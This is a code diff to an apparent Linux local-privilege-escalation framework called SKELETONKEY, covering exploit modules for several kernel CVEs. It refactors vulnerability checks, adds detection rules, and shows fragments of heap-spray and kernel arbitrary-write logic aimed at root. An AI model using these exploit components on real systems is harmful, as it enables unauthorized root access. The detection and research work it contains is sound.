-__attribute__((unused)) static int    ioctl(int a, unsigned long b, ...) { (void)a; (void)b; errno=ENOSYS; return -1; }
-__attribute__((unused)) static void  *mmap(void *a, size_t b, int c, int d, int e, long f) { (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; errno=ENOSYS; return (void*)-1; }
-__attribute__((unused)) static int    munmap(void *a, size_t b) { (void)a;(void)b; return -1; }
-__attribute__((unused)) static int    setsockopt(int a, int b, int c, const void *d, unsigned int e) { (void)a;(void)b;(void)c;(void)d;(void)e; errno=ENOSYS; return -1; }
-__attribute__((unused)) static int    poll(struct pollfd *a, unsigned long b, int c) { (void)a;(void)b;(void)c; errno=ENOSYS; return -1; }
-__attribute__((unused)) static unsigned short htons(unsigned short x) { return x; }
-#define MAP_SHARED  0x01
-#define MAP_LOCKED  0x2000
-#define PROT_READ   0x1
-#define PROT_WRITE  0x2
-#define MAP_FAILED ((void *)-1)
-#endif

 static const struct kernel_patched_from af_packet2_patched_branches[] = {
    {4,  9, 235},
@@ -135,53 +92,44 @@ static const struct kernel_range af_packet2_range = {
                      sizeof(af_packet2_patched_branches[0]),
 };

-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static skeletonkey_result_t af_packet2_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] af_packet2: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] af_packet2: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced in 4.6 (tpacket_rcv VLAN path). Pre-4.6 immune. */
-    if (v.major < 4 || (v.major == 4 && v.minor < 6)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 4, 6, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[+] af_packet2: kernel %s predates the bug (introduced in 4.6)\n",
-                    v.release);
+                    v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&af_packet2_range, &v);
+    bool patched = kernel_range_is_patched(&af_packet2_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] af_packet2: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] af_packet2: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;
    if (!ctx->json) {
-        fprintf(stderr, "[i] af_packet2: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[i] af_packet2: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] af_packet2: user_ns+net_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" : "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] af_packet2: user_ns denied → unprivileged exploit unreachable\n");
        }
@@ -223,8 +171,6 @@ static skeletonkey_result_t af_packet2_detect(const struct skeletonkey_ctx *ctx)
 * the primitive. It does not land cred overwrite.
 */

-#ifdef __linux__
-
 /* sendmmsg spray helper — best-effort skb groom. Adjacent kernel slab
 * objects are sprayed so the OOB write lands on attacker bytes. */
 static void af_packet2_skb_spray(int n_iters)
@@ -440,15 +386,6 @@ static int af_packet2_primitive_child(const struct skeletonkey_ctx *ctx)
    return 0;
 }

-#else /* !__linux__: provide a stub for macOS sanity builds */
-static int af_packet2_primitive_child(const struct skeletonkey_ctx *ctx)
-{
-    (void)ctx;
-    fprintf(stderr, "[-] af_packet2: linux-only primitive — non-linux build\n");
-    return -1;
-}
-#endif
-
 /* ---- Full-chain finisher (--full-chain, x86_64 only) ----------------
 *
 * Arb-write strategy (Or Cohen's sk_buff-data-pointer hijack):
@@ -490,7 +427,7 @@ struct afp2_arb_ctx {
    int n_attempts;            /* spray/fire rounds before giving up */
 };

-#if defined(__x86_64__) && defined(__linux__)
+#if defined(__x86_64__)
 static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
 {
    struct afp2_arb_ctx *c = (struct afp2_arb_ctx *)vctx;
@@ -508,9 +445,7 @@ static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vc
     * frame would then write our payload (the modprobe_path string)
     * into the forged ->data target. */
    for (int i = 0; i < c->n_attempts; i++) {
-#ifdef __linux__
        af_packet2_skb_spray(8);
-#endif
        pid_t p = fork();
        if (p < 0) return -1;
        if (p == 0) {
@@ -535,9 +470,7 @@ static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vc
        }
        int st;
        waitpid(p, &st, 0);
-#ifdef __linux__
        af_packet2_skb_spray(8);
-#endif
    }

    /* LAST-RESORT depth: we have fired the trigger + spray but cannot
@@ -572,8 +505,11 @@ static skeletonkey_result_t af_packet2_exploit(const struct skeletonkey_ctx *ctx
        return pre;
    }

-    /* 2. Refuse if already root. */
-    if (geteuid() == 0) {
+    /* 2. Refuse if already root. Consult ctx->host first so unit tests
+     *    can construct a non-root fingerprint regardless of the test
+     *    process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] af_packet2: already running as root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -664,7 +600,7 @@ static skeletonkey_result_t af_packet2_exploit(const struct skeletonkey_ctx *ctx
                            "    skeletonkey intentionally does not embed per-kernel offsets.\n");
        }
        if (ctx->full_chain) {
-#if defined(__x86_64__) && defined(__linux__)
+#if defined(__x86_64__)
            /* --full-chain: resolve kernel offsets and run the Or-Cohen
             * sk_buff-data-pointer hijack via the shared modprobe_path
             * finisher. Per the verified-vs-claimed bar: if we can't
@@ -703,6 +639,29 @@ static skeletonkey_result_t af_packet2_exploit(const struct skeletonkey_ctx *ctx
    }
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: AF_PACKET + TPACKET_V2 + tpacket_rcv VLAN
+ * underflow are Linux-only kernel surface. Stub out cleanly so the
+ * module still registers and `--list` / `--detect-rules` work on
+ * macOS/BSD dev boxes — and so the top-level `make` actually completes
+ * there. */
+static skeletonkey_result_t af_packet2_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] af_packet2: Linux-only module "
+                "(AF_PACKET TPACKET_V2 + user_ns) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t af_packet2_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] af_packet2: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+
+#endif /* __linux__ */
+
 static const char af_packet2_auditd[] =
    "# AF_PACKET VLAN LPE (CVE-2020-14386) — auditd detection rules\n"
    "# Same syscall surface as CVE-2017-7308 — share the skeletonkey-af-packet\n"
@@ -710,6 +669,54 @@ static const char af_packet2_auditd[] =
    "# non-root via userns is the canonical footprint.\n"
    "-a always,exit -F arch=b64 -S socket -F a0=17 -k skeletonkey-af-packet\n";

+static const char af_packet2_sigma[] =
+    "title: Possible CVE-2020-14386 AF_PACKET VLAN underflow exploitation\n"
+    "id: b83c6fa2-skeletonkey-af-packet2\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects the AF_PACKET TPACKET_V2 nested-VLAN frame pattern:\n"
+    "  unshare(CLONE_NEWUSER|CLONE_NEWNET) followed by socket(AF_PACKET),\n"
+    "  PACKET_RX_RING setsockopt, and a sendmmsg burst (>=64) on a unix\n"
+    "  socketpair spray. False positives: legitimate packet capture in\n"
+    "  rootless containers.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns:    {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  afp:       {type: 'SYSCALL', syscall: 'socket', a0: 17}\n"
+    "  send_burst:{type: 'SYSCALL', syscall: 'sendmmsg'}\n"
+    "  condition: userns and afp and send_burst\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2020.14386]\n";
+
+static const char af_packet2_yara[] =
+    "rule af_packet2_cve_2020_14386 : cve_2020_14386 heap_spray\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2020-14386\"\n"
+    "        description = \"AF_PACKET VLAN-underflow spray tag (skeletonkey-afp-fc-)\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"skeletonkey-afp-fc-\" ascii\n"
+    "    condition:\n"
+    "        $tag\n"
+    "}\n";
+
+static const char af_packet2_falco[] =
+    "- rule: AF_PACKET TPACKET_V2 nested-VLAN trigger by non-root\n"
+    "  desc: |\n"
+    "    A non-root process sets up TPACKET_V2 and sends a burst of\n"
+    "    sendmmsg packets carrying nested VLAN tags (CVE-2020-14386\n"
+    "    trigger). False positives: legitimate VLAN/network capture\n"
+    "    tools in unprivileged containers.\n"
+    "  condition: >\n"
+    "    evt.type = sendmmsg and fd.type = socket and\n"
+    "    fd.sockfamily = AF_PACKET and not user.uid = 0\n"
+    "  output: >\n"
+    "    sendmmsg burst on AF_PACKET socket by non-root\n"
+    "    (user=%user.name pid=%proc.pid vlen=%evt.arg.vlen)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2020.14386]\n";
+
 const struct skeletonkey_module af_packet2_module = {
    .name           = "af_packet2",
    .cve            = "CVE-2020-14386",
@@ -721,9 +728,10 @@ const struct skeletonkey_module af_packet2_module = {
    .mitigate       = NULL,
    .cleanup        = NULL,
    .detect_auditd  = af_packet2_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = af_packet2_sigma,
+    .detect_yara    = af_packet2_yara,
+    .detect_falco   = af_packet2_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNET) + TPACKET_V2 ring on AF_PACKET; crafts nested-VLAN ETH_P_8021AD frames with 0x88A8/0x8100 TPIDs to trigger tpacket_rcv underflow; fires 256 frames + 64 sendmmsg via AF_UNIX socketpair spray. Tag 'skeletonkey-afp-fc-' visible in KASAN splats. Audit-visible via socket(AF_PACKET) + sendmsg/sendto from userns. No persistent artifacts; kernel cleans up on child exit.",
 };

 void skeletonkey_register_af_packet2(void)
@@ -60,17 +60,23 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
 #include <stdint.h>
 #include <string.h>
+#include <stdbool.h>
+#include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
 #include <errno.h>
 #include <fcntl.h>
-#include <unistd.h>
 #include <sched.h>
 #include <sys/wait.h>
 #include <sys/socket.h>
@@ -106,44 +112,35 @@ static const struct kernel_range af_packet_range = {
                      sizeof(af_packet_patched_branches[0]),
 };

-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static skeletonkey_result_t af_packet_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] af_packet: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] af_packet: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

-    bool patched = kernel_range_is_patched(&af_packet_range, &v);
+    bool patched = kernel_range_is_patched(&af_packet_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] af_packet: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] af_packet: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;
    if (!ctx->json) {
-        fprintf(stderr, "[i] af_packet: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[i] af_packet: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] af_packet: user_ns+net_ns clone (CAP_NET_RAW gate): %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" : "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] af_packet: user_ns denied → "
                            "unprivileged exploit unreachable\n");
@@ -718,8 +715,11 @@ static skeletonkey_result_t af_packet_exploit(const struct skeletonkey_ctx *ctx)
        return pre;
    }

-    /* 2. Refuse if already root. */
-    if (geteuid() == 0) {
+    /* 2. Refuse if already root. Consult ctx->host first so unit tests
+     *    can construct a non-root fingerprint regardless of the test
+     *    process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] af_packet: already root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -727,16 +727,19 @@ static skeletonkey_result_t af_packet_exploit(const struct skeletonkey_ctx *ctx)
    /* 3. Resolve offsets for THIS kernel. If we don't have them, bail
     *    early — the kernel-write walk needs them. The integrator can
     *    extend known_offsets[] for new distro builds. */
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] af_packet: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }
    struct af_packet_offsets off;
-    if (!resolve_offsets(&off, &v)) {
+    if (!resolve_offsets(&off, v)) {
        fprintf(stderr, "[-] af_packet: no offset table for kernel %s\n"
                        "    set SKELETONKEY_AFPACKET_OFFSETS=<task_cred>:<cred_uid>:<cred_size>\n"
                        "    (hex). Known table covers Ubuntu 16.04 (4.4) and 18.04 (4.15).\n",
-                v.release);
+                v->release);
        return SKELETONKEY_PRECOND_FAIL;
    }
    if (!ctx->json) {
@@ -858,12 +861,85 @@ static skeletonkey_result_t af_packet_exploit(const struct skeletonkey_ctx *ctx)
 #endif
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: AF_PACKET + unshare(CLONE_NEWUSER|CLONE_NEWNET)
+ * + TPACKET_V3 ring are Linux-only kernel surface; the TPACKET_V3
+ * integer-overflow primitive is structurally unreachable elsewhere.
+ * Stub out cleanly so the module still registers and `--list` /
+ * `--detect-rules` work on macOS/BSD dev boxes — and so the top-level
+ * `make` actually completes there. */
+static skeletonkey_result_t af_packet_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] af_packet: Linux-only module "
+                "(AF_PACKET TPACKET_V3 + user_ns) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t af_packet_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] af_packet: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+
+#endif /* __linux__ */
+
 static const char af_packet_auditd[] =
    "# AF_PACKET TPACKET_V3 LPE (CVE-2017-7308) — auditd detection rules\n"
    "# Flag AF_PACKET socket creation from non-root via userns.\n"
    "-a always,exit -F arch=b64 -S socket -F a0=17 -k skeletonkey-af-packet\n"
    "-a always,exit -F arch=b64 -S unshare -k skeletonkey-af-packet-userns\n";

+static const char af_packet_sigma[] =
+    "title: Possible CVE-2017-7308 AF_PACKET TPACKET_V3 exploitation\n"
+    "id: a72b5e91-skeletonkey-af-packet\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects the AF_PACKET TPACKET_V3 integer-overflow setup pattern:\n"
+    "  unshare(CLONE_NEWUSER|CLONE_NEWNET) followed by socket(AF_PACKET)\n"
+    "  and a PACKET_RX_RING setsockopt + sendmmsg burst. False positives:\n"
+    "  network sandboxes / containers running raw-packet apps inside\n"
+    "  userns; correlate process tree to distinguish.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns:    {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  afp:       {type: 'SYSCALL', syscall: 'socket', a0: 17}\n"
+    "  send_burst:{type: 'SYSCALL', syscall: 'sendmmsg'}\n"
+    "  condition: userns and afp and send_burst\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2017.7308]\n";
+
+static const char af_packet_yara[] =
+    "rule af_packet_cve_2017_7308 : cve_2017_7308 heap_spray\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2017-7308\"\n"
+    "        description = \"AF_PACKET TPACKET_V3 spray tag from skeletonkey/iam-root tooling\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag1 = \"iamroot-afp-tag\" ascii\n"
+    "        $tag2 = \"skeletonkey-afp-fc-\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char af_packet_falco[] =
+    "- rule: AF_PACKET TPACKET_V3 setup by non-root in userns\n"
+    "  desc: |\n"
+    "    A non-root process creates an AF_PACKET socket and sets up a\n"
+    "    TPACKET_V3 ring inside a user namespace. CVE-2017-7308 trigger\n"
+    "    requires CAP_NET_RAW which userns provides. False positives:\n"
+    "    legitimate packet-capture tools running rootless (rare).\n"
+    "  condition: >\n"
+    "    evt.type = setsockopt and evt.arg.optname contains PACKET_RX_RING\n"
+    "    and not user.uid = 0\n"
+    "  output: >\n"
+    "    AF_PACKET TPACKET_V3 ring setup by non-root\n"
+    "    (user=%user.name proc=%proc.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2017.7308]\n";
+
 const struct skeletonkey_module af_packet_module = {
    .name           = "af_packet",
    .cve            = "CVE-2017-7308",
@@ -875,9 +951,10 @@ const struct skeletonkey_module af_packet_module = {
    .mitigate       = NULL,
    .cleanup        = NULL,
    .detect_auditd  = af_packet_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = af_packet_sigma,
+    .detect_yara    = af_packet_yara,
+    .detect_falco   = af_packet_falco,
+    .opsec_notes    = "Creates AF_PACKET socket and TPACKET_V3 ring inside unshare(CLONE_NEWUSER|CLONE_NEWNET); triggers integer overflow with crafted tp_block_size/tp_block_nr and sprays ~200 loopback frames. Audit-visible via socket(AF_PACKET) (a0=17) + sendmmsg from a userns process; KASAN tag 'iamroot-afp-tag' may appear in dmesg if enabled. No persistent files. No cleanup callback - kernel state unwinds on child exit.",
 };

 void skeletonkey_register_af_packet(void)
@@ -58,6 +58,7 @@
 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/host.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"

@@ -104,6 +105,7 @@ static const struct kernel_patched_from af_unix_gc_patched_branches[] = {
    {5, 10, 197},
    {5, 15, 130},
    {6,  1,  51},   /* 6.1 LTS */
+    {6,  4,  13},   /* 6.4.x stable (per Debian tracker — forky/sid/trixie) */
    {6,  5,   0},   /* mainline fix landed in 6.5 (technically 6.6-rc1
                       but stable 6.5.x carries the patch) */
 };
@@ -129,9 +131,14 @@ static bool can_create_af_unix(void)

 static skeletonkey_result_t af_unix_gc_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] af_unix_gc: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] af_unix_gc: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

@@ -139,10 +146,10 @@ static skeletonkey_result_t af_unix_gc_detect(const struct skeletonkey_ctx *ctx)
     * the dawn of time. ANY kernel below the fix is vulnerable. The
     * kernel_range walker handles "older than every entry" correctly
     * (returns false → not patched → vulnerable). */
-    bool patched = kernel_range_is_patched(&af_unix_gc_range, &v);
+    bool patched = kernel_range_is_patched(&af_unix_gc_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] af_unix_gc: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] af_unix_gc: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }
@@ -157,7 +164,7 @@ static skeletonkey_result_t af_unix_gc_detect(const struct skeletonkey_ctx *ctx)
    }

    if (!ctx->json) {
-        fprintf(stderr, "[!] af_unix_gc: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[!] af_unix_gc: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] af_unix_gc: bug is reachable as PLAIN UNPRIVILEGED USER\n"
                        "    (no userns / no CAP_* required — AF_UNIX is universally\n"
                        "    creatable). The race window is microseconds wide and\n"
@@ -549,7 +556,8 @@ static skeletonkey_result_t af_unix_gc_exploit_linux(const struct skeletonkey_ct
        fprintf(stderr, "[-] af_unix_gc: detect() says not vulnerable; refusing\n");
        return pre;
    }
-    if (geteuid() == 0) {
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] af_unix_gc: already root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -825,6 +833,56 @@ static const char af_unix_gc_auditd[] =
    "-a always,exit -F arch=b64 -S sendmsg    -k skeletonkey-afunixgc-sendmsg\n"
    "-a always,exit -F arch=b64 -S msgsnd     -k skeletonkey-afunixgc-spray\n";

+static const char af_unix_gc_sigma[] =
+    "title: Possible CVE-2023-4622 AF_UNIX GC UAF race\n"
+    "id: c45d7eb3-skeletonkey-af-unix-gc\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects tight-loop socketpair(AF_UNIX) + sendmsg with SCM_RIGHTS\n"
+    "  + msgsnd grooming pattern characteristic of the AF_UNIX garbage\n"
+    "  collector race. False positives: legitimate IPC apps use\n"
+    "  SCM_RIGHTS, but the high-frequency close-and-recreate cycle is\n"
+    "  unusual outside fuzzing / exploit harnesses.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  sp:    {type: 'SYSCALL', syscall: 'socketpair', a0: 1}\n"
+    "  scm:   {type: 'SYSCALL', syscall: 'sendmsg'}\n"
+    "  groom: {type: 'SYSCALL', syscall: 'msgsnd'}\n"
+    "  condition: sp and scm and groom\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2023.4622]\n";
+
+static const char af_unix_gc_yara[] =
+    "rule af_unix_gc_cve_2023_4622 : cve_2023_4622 kernel_uaf\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2023-4622\"\n"
+    "        description = \"AF_UNIX GC race kmalloc-512 spray tag or log breadcrumb\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"SKELETONKEYU\" ascii\n"
+    "        $log = \"/tmp/skeletonkey-af_unix_gc.log\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char af_unix_gc_falco[] =
+    "- rule: SCM_RIGHTS cycling on AF_UNIX with msg_msg groom\n"
+    "  desc: |\n"
+    "    Tight socketpair(AF_UNIX) + sendmsg(SCM_RIGHTS) + msgsnd\n"
+    "    pattern characteristic of the AF_UNIX garbage collector\n"
+    "    race (CVE-2023-4622). False positives: IPC libraries use\n"
+    "    SCM_RIGHTS legitimately but rarely with the close-and-\n"
+    "    recreate cycle at this frequency.\n"
+    "  condition: >\n"
+    "    evt.type = sendmsg and fd.sockfamily = AF_UNIX and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    SCM_RIGHTS sendmsg on AF_UNIX by non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [ipc, mitre_privilege_escalation, T1068, cve.2023.4622]\n";
+
 const struct skeletonkey_module af_unix_gc_module = {
    .name           = "af_unix_gc",
    .cve            = "CVE-2023-4622",
@@ -836,9 +894,10 @@ const struct skeletonkey_module af_unix_gc_module = {
    .mitigate       = NULL,
    .cleanup        = af_unix_gc_cleanup,
    .detect_auditd  = af_unix_gc_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = af_unix_gc_sigma,
+    .detect_yara    = af_unix_gc_yara,
+    .detect_falco   = af_unix_gc_falco,
+    .opsec_notes    = "Two-threaded race: Thread A creates socketpair(AF_UNIX) with SCM_RIGHTS cycle then close; Thread B drives independent SCM_RIGHTS traffic on a held pair. ~5s budget (30s with --full-chain). msg_msg kmalloc-512 spray tagged 'SKELETONKEYU'. Writes /tmp/skeletonkey-af_unix_gc.log with empirical stats. Audit-visible via socketpair(AF_UNIX) + sendmsg(SCM_RIGHTS) + msgsnd triple. Dmesg may show UAF KASAN if kernel vulnerable. Cleanup callback unlinks the log.",
 };

 void skeletonkey_register_af_unix_gc(void)
@@ -38,7 +38,6 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -46,6 +45,11 @@
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
 #include <fcntl.h>
 #include <errno.h>
 #include <sched.h>
@@ -71,44 +75,40 @@ static const struct kernel_range cgroup_ra_range = {
                      sizeof(cgroup_ra_patched_branches[0]),
 };

-static int can_unshare_userns_mount(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNS) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
+/* The unprivileged-userns precondition is now read from the shared
+ * host fingerprint (ctx->host->unprivileged_userns_allowed), which
+ * probes once at startup via core/host.c. The previous per-detect
+ * fork-probe helper was removed. */

 static skeletonkey_result_t cgroup_ra_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] cgroup_release_agent: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] cgroup_release_agent: host fingerprint missing kernel "
+                "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

-    bool patched = kernel_range_is_patched(&cgroup_ra_range, &v);
+    bool patched = kernel_range_is_patched(&cgroup_ra_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] cgroup_release_agent: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] cgroup_release_agent: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns_mount();
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;
    if (!ctx->json) {
-        fprintf(stderr, "[i] cgroup_release_agent: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[i] cgroup_release_agent: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] cgroup_release_agent: user_ns+mount_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" : "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] cgroup_release_agent: user_ns denied → unprivileged exploit unreachable\n");
        }
@@ -154,7 +154,10 @@ static skeletonkey_result_t cgroup_ra_exploit(const struct skeletonkey_ctx *ctx)
        fprintf(stderr, "[-] cgroup_release_agent: detect() says not vulnerable; refusing\n");
        return pre;
    }
-    if (geteuid() == 0) {
+    /* Consult ctx->host->is_root so unit tests can construct a
+     * non-root fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] cgroup_release_agent: already root\n");
